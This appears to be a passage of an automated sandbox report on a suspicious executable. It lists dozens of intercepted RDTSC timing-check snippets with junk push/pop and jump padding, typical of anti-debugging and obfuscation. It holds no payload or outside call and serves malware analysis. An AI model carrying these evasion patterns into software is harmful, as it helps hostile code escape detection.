Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E61E9C second address: E61EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E61EA0 second address: E61EB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E62016 second address: E62032 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43C9098CE6h 0x00000008 jmp 00007F43C9098CF2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6219C second address: E621BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E621BB second address: E621D8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43C9098CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F43C9098CECh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E64D2A second address: E64D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E648DD second address: E648E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E648E5 second address: E648EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E648EA second address: E64919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F43C9098CF2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 jmp 00007F43C9098CF0h 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6A5D7 second address: E6A5E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F43C8AE0076h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6A5E3 second address: E6A5F2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C9098CE6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6A5F2 second address: E6A604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E114A7 second address: E114F1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d and cl, FFFFFFECh 0x00000010 mov ebx, dword ptr [ebp+124954C2h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F43C9098CE8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 add eax, ebx 0x00000032 mov cx, E6D9h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jne 00007F43C9098CE6h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E114F1 second address: E1150D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6AF2F second address: E6AF40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CEBh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6AF40 second address: E6AF66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F43C8AE0076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F43C8AE0082h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edi 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6E75C second address: E6E786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF6h 0x00000007 push edx 0x00000008 jc 00007F43C9098CE6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push esi 0x00000014 push esi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6E8F4 second address: E6E908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43C8AE0076h 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6E908 second address: E6E90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6EAA1 second address: E6EAB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43C8AE007Ch 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6EAB9 second address: E6EABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6EE4F second address: E6EE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6EE53 second address: E6EE79 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C9098CE6h 0x00000008 jl 00007F43C9098CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F43C9098CF1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6EE79 second address: E6EE94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E6EE94 second address: E6EE9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E73444 second address: E7344A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7344A second address: E73450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E73450 second address: E73479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C8AE0083h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F43C8AE007Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E73479 second address: E73483 instructions: 0x00000000 rdtsc 0x00000002 je 00007F43C9098CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E73483 second address: E7348F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43C8AE0093h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E73778 second address: E73795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E73795 second address: E73799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E73A85 second address: E73A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E73BD8 second address: E73BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E73BDE second address: E73BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E73BE2 second address: E73BFB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C8AE0076h 0x00000008 jnp 00007F43C8AE0076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 je 00007F43C8AE0076h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E73BFB second address: E73C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7CCD2 second address: E7CCD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7AC75 second address: E7AC93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C9098CF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7AE03 second address: E7AE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7AE07 second address: E7AE0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7AE0B second address: E7AE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE0080h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7AE26 second address: E7AE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F43C9098CF0h 0x0000000b popad 0x0000000c jmp 00007F43C9098CEBh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7AE4C second address: E7AE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE0089h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7AFA7 second address: E7AFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F43C9098CE6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jp 00007F43C9098CE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7AFBA second address: E7AFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7AFC2 second address: E7AFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7AFD0 second address: E7AFEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C8AE0084h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7AFEF second address: E7AFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7B542 second address: E7B548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7B548 second address: E7B54C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7B8AF second address: E7B8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7B8C0 second address: E7B8DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CECh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e jnp 00007F43C9098CE6h 0x00000014 pop eax 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7BB85 second address: E7BB8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7BE6B second address: E7BE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7BE6F second address: E7BE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7C0E3 second address: E7C0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7C0E7 second address: E7C0F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F43C8AE0078h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7C0F5 second address: E7C0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7C0FB second address: E7C101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7C101 second address: E7C145 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007F43C9098D05h 0x00000013 push edi 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop edi 0x00000017 jp 00007F43C9098CF2h 0x0000001d js 00007F43C9098CE6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7C6D9 second address: E7C6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7C6DF second address: E7C6ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F43C9098CECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E7C9E1 second address: E7C9F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F43C8AE0076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F43C8AE0076h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E85E9D second address: E85EBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF5h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E850BD second address: E850DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE0089h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E85941 second address: E85958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 jc 00007F43C9098CF6h 0x0000000c pushad 0x0000000d je 00007F43C9098CE6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E85BC3 second address: E85BC9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E85BC9 second address: E85BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E880A0 second address: E880A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E8E855 second address: E8E85B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E8E85B second address: E8E85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E8EE02 second address: E8EE07 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E8EE07 second address: E8EE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E8EF67 second address: E8EF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E8F275 second address: E8F27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E8F27A second address: E8F27F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E8F27F second address: E8F285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E8F565 second address: E8F571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F43C9098CE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E8F571 second address: E8F58C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0087h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E8F58C second address: E8F595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E9700B second address: E97011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E97011 second address: E97017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E97017 second address: E97021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F43C8AE0076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E97021 second address: E9702E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E96A97 second address: E96A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E96A9B second address: E96AA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E96AA6 second address: E96AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E96AAD second address: E96AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E96AB5 second address: E96AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E96D2B second address: E96D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E96D31 second address: E96D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E96D39 second address: E96D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C9098CECh 0x00000009 je 00007F43C9098CE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: E96D51 second address: E96D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: EA6A03 second address: EA6A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
